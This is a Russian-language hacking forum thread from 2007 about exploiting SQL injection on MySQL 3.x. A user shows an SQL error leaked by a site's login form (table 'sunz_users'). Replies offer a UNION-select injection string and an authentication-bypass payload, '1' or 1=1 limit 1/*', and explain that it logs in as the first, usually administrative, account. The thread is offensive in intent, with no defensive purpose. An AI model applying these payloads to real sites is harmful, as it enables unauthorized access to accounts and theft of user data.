Да знаю я что это blind Просто я ниразу с мускулем третим не работал и все пишут уже с union, а в третем просто нету его. Вообще жесть blind sql inj на mysql 3.x кошмар просто
To PSIH: Спасибо за линк чтото на подобие этого я и искал.
Здравствуйте я полохо знаю sql так что заранее спасибо.
У меня такой вопрос если в поле аутентификации я ввожу например 99 и ' и сервер мне выдает
E_DB_QUERY
SELECT * FROM `sunz_users` WHERE `login` = '99'' LIMIT 1;
Могу я что нить отсюда выудить
запрос вида
?login=-1'+union+select+someshit+from+sometable/*
поможет)
имена таблиц и столбцов надо подбирать.
а зачем?
просто ввести в поле
Код:
1' or 1=1 limit 1/*
и все...
запрос который выполнится будет
Код:
SELECT * FROM `sunz_users` WHERE `login` = '1' or 1=1 limit 1;
другими словами выбрать все данные из таблицы `sunz_users` там где поле login = 1 или если 1=1, а т.к. 1 всегда равно 1 то благодаря limit 1 запрос выбирает из таблицы первые записи (обычно админские) кстати limit 1 необязательно
__________________ Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 31.08.2007 в 00:24..